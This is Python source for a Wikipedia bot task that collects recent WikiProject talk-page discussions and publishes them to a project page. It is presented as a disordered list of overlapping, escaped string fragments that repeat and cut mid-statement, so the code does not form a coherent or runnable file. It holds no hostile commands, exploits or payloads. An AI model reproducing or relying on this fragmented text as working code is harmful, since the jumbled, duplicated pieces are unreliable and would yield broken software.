\"\"\" query = \"\"\"SELECT DISTINCT rc_namespace,", "set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if", "in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after", "updated) self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow()", "for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections =", "in discussions if disc.title not in current][:3] return discussions, news def _save_discussions(self, project,", "mapping talk page titles to lists of section tuples. Given a WikiProject new", "\"discussions\": disclist } summary = \"Updating new discussions\" if news: summary += \":", "pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return", "page.ns + 1, page.title) if title in updated: sections[title] = updated[title] elif title", "end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in", "Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from", "self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\":", "of pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError):", "that have been updated in the given time range. \"\"\" query = \"\"\"SELECT", "= 1 OR rc_type = 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\")", "rc_timestamp >= ? AND rc_timestamp < ? 
AND rc_namespace % 2 = 1", "self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\": project.name,", "from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"]", "= mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match", "self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self, title):", "timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp)", "!= 3 AND (rc_type = 0 OR rc_type = 1 OR rc_type =", "code = mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean = section.strip_code()", "AND rc_namespace % 2 = 1 AND rc_namespace != 3 AND (rc_type =", "ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a", "sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\"", "} for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before", "\"\"\" from collections import namedtuple from datetime import datetime import re from reportsbot.task", "def _extract_sections(self, text): \"\"\"Return a list of section tuples for the given page.\"\"\"", "= namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions", "utf-8 -*- \"\"\" New Discussions -- Provides a list of new discussions within", "Request(self._bot.site, parameters={ \"action\": 
\"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\":", "for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and", "if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except", "\"\"\"Save the given list of discussions to the given page title.\"\"\" text =", "the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name +", "self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict", "= self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self,", "text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates():", "fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:])", "end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts) with self._bot.wikidb as", "= namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates", "currently listed. 
\"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for", "discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return", "= [_Discussion(title, section.name, section.timestamp) for title in sections for section in sections[title]] discussions.sort(key=lambda", "WikiProject new discussions page, return all discussions currently listed. \"\"\" text = self._bot.get_page(title).text", "titles to lists of section tuples. Given a WikiProject new discussions page, return", "= str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title]", "return sections def _load_pages(self, titles): \"\"\"Load a chunk of pages from the API.\"\"\"", "Discussions -- Provides a list of new discussions within a WikiProject's scope Copyright", "or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return", "= \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title, \"name\":", "pages, current, updated): \"\"\"Return a sorted list of the most recent discussion tuples.\"\"\"", "%s and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles", "the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX", "discussions\" if news: summary += \": \" + \", \".join(\"[[%s]]\" % item for", "else: discussions[title] = {section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a", "to parse [[%s]]\", title) return sections def _get_current_discussions(self, title): 
\"\"\"Return a dict mapping", "\"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"],", "(KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\":", "_process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of the most recent discussion", "text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary", "datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of", "title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles", "given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action", "def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string, or ValueError.\"\"\" return", "MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime import datetime import", "(C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections", "end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"): self._process(project, updated) self._bot.set_last_updated(\"new_discussions\",", "page titles to lists of section tuples. The only pages included in the", "from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion", "current][:3] return discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given", "updated in the given time range. 
\"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title", "and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles =", "discussions for %s\", project.name) title = project.name + \"/Discussions\" pages = project.get_members() current", "a list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new", "title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated =", "dict are those that have been updated in the given time range. \"\"\"", "updated): \"\"\"Return a sorted list of the most recent discussion tuples.\"\"\" sections =", "= \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp", "AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated", "2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive", "\": \" + \", \".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False)", "title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else:", "clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp", "action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View", "disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, 
%H:%M:%S\"))", "tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\")", "disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in", "titles): \"\"\"Load a chunk of pages from the API.\"\"\" def _get_rev(page): try: return", "a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}}", "string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text):", "dict mapping talk page titles to lists of section tuples. Given a WikiProject", "}} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template =", "titles to lists of section tuples. The only pages included in the dict", "with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for", "for title, text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to", "title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections", "if title in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self,", "\"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in discussions] fold =", "those that have been updated in the given time range. 
\"\"\" query =", "\"\"\" New Discussions -- Provides a list of new discussions within a WikiProject's", "return discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given list", "disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD", "= set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean)", "= self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def", "sections def _load_pages(self, titles): \"\"\"Load a chunk of pages from the API.\"\"\" def", "project.name) title = project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions,", "startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns,", "\"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated)", "= self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def", "= join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated: sections[title] = updated[title]", "a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License:", "<NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime", "within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD", "return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = 
Request(self._bot.site, parameters={ \"action\": \"query\",", "new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a", "the most recent discussion tuples.\"\"\" sections = {} for page in pages: title", "discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to", "= [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"])", "start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\"", "start, end): \"\"\"Return a dict mapping talk page titles to lists of section", "\"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for", "button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list", "= \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after +", "namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions within", "as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title)", "Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template", "[(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict", "sections for section in sections[title]] 
discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for", "return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\":", "%(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [", "discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name,", "in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {} chunksize =", "self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project", "= section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp =", "(UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section tuples for the given", "page titles to lists of section tuples. Given a WikiProject new discussions page,", "{{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX", "\"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button", "range. 
\"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >=", "return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list", "in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news", "discussions = [_Discussion(title, section.name, section.timestamp) for title in sections for section in sections[title]]", "< ? AND rc_namespace % 2 = 1 AND rc_namespace != 3 AND", "\"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in discussions]", "of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE", "sections for %s pages\", len(titles)) sections = {} chunksize = 50 for start", "news = [disc.title for disc in discussions if disc.title not in current][:3] return", "\"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data", "mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match =", "rc_type = 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\")", "self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if tmpl.name", "2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections import", "in current][:3] return discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the", "except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles):", "to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable 
button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude>", "under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime import datetime", "datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if", "_get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={", "else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text", "+ \", \".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False) def _process(self,", "except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\",", "\"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def", "sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles to lists", "all discussions currently listed. 
\"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions =", "title = join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated: sections[title] =", "reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title,", "pages = self._load_pages(chunk) for title, text in pages: try: sections[title] = self._extract_sections(text) except", "{{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX", "disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text %", "= {section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list", "if news: summary += \": \" + \", \".join(\"[[%s]]\" % item for item", "cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {} chunksize = 50", "discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given list of", "FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ? AND rc_namespace %", "page, return all discussions currently listed. 
\"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text)", "at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc", "1 OR rc_type = 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts", "ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles))", "except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return", "news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions for the given", "[\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list", "and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title", "= {} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not", "_parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text),", "only pages included in the dict are those that have been updated in", "_get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles to lists of section", "in the given time range. 
\"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM", "\"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc", "mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a", "updated: sections[title] = updated[title] elif title in current: sections[title] = current[title] discussions =", "\"Updating new discussions\" if news: summary += \": \" + \", \".join(\"[[%s]]\" %", "news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end)", "_extract_sections(self, text): \"\"\"Return a list of section tuples for the given page.\"\"\" code", "mapping talk page titles to lists of section tuples. The only pages included", "a chunk of pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except", "have been updated in the given time range. 
\"\"\" query = \"\"\"SELECT DISTINCT", "} summary = \"Updating new discussions\" if news: summary += \": \" +", "self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title", "updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\",", "sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in sections for", "chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages: try:", "data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start,", "% item for item in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process", "def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site,", "endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections", "%Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section tuples for the", "elif title in current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for", "list of the most recent discussion tuples.\"\"\" sections = {} for page in", "for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name", "parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles)", "% 2 = 1 AND rc_namespace != 3 AND (rc_type = 0 OR", "match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp = 
self._parse_timestamp(match.group(0)) except", "in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self, pages, current,", "of the most recent discussion tuples.\"\"\" sections = {} for page in pages:", "= self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if", "list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template %", "new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title", "title = project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news", "discitems = [ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d", "of new discussions within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME>", "mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue", "= \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist", "1 AND rc_namespace != 3 AND (rc_type = 0 OR rc_type = 1", "discussions = {} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if", "= before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk", "\"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new", "[\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions within a", "3 AND (rc_type = 0 OR rc_type = 1 OR rc_type = 3)", "in pages: try: sections[title] = 
self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title)", "projtalk, \"discussions\": disclist } summary = \"Updating new discussions\" if news: summary +=", "list of discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button", "from collections import namedtuple from datetime import datetime import re from reportsbot.task import", "updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems =", "try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return", "= start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts,", "WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}}", "updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"):", "[[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page", "discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title =", "New Discussions -- Provides a list of new discussions within a WikiProject's scope", "rc_namespace != 3 AND (rc_type = 0 OR rc_type = 1 OR rc_type", "= [disc.title for disc in discussions if disc.title not in current][:3] return discussions,", "0 OR rc_type = 1 OR rc_type = 3) AND rc_bot = 0\"\"\"", "= end.strftime(\"%Y%m%d%H%M%S\") 
self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts) with self._bot.wikidb", "\"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\",", "disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in discussions] fold", "the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last", "pages\", len(titles)) sections = {} chunksize = 50 for start in range(0, len(titles),", "return all discussions currently listed. \"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions", "(UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold:", "import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\",", "summary += \": \" + \", \".join(\"[[%s]]\" % item for item in news)", "= titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages: try: sections[title] =", "match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name,", "rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ? 
